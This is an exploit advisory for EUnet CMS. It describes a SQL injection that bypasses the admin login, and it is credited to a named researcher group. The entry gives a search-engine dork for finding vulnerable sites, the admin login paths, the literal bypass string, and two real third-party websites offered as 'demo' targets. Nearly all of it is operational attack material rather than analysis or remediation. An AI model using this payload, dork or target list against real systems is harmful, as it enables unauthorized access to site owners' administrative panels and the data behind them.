EUnet CMS suffers from a remote SQL injection vulnerability that allows for login bypass. Note that this finding houses site-specific data.
186aea02fc4baf240db6509ce6ab04fd1d7238a29e09b0e6d836923977c85196
# Title : EUnet CMS Login Bypass Vulnerability
#
# Vendor : http://eunet.gr/
#
# Dork : intext:"CMS by EUnet"
#
# Tested On Windows 8 , With Browser FireFox 30.0
#
#
# Wtih This Vulnerability You Can Bypass Admin Page
#
#
# Admin Page : TARGET/adm/login.php | For English Lang : TARGET/adm/login.php?rowsets=1&Lang11=2&submit=1
#
# String For Bypass : '=' 'or'
#
# Demo :
#
# http://www.emco.gr/adm/login.php
# http://ppol.gr/cm/adm/admin.php
--------------------
Credit : Hadi Arjmand , SeCTime.Ir
Thanks : All Iranian Researchers And Exploiters
----- End -----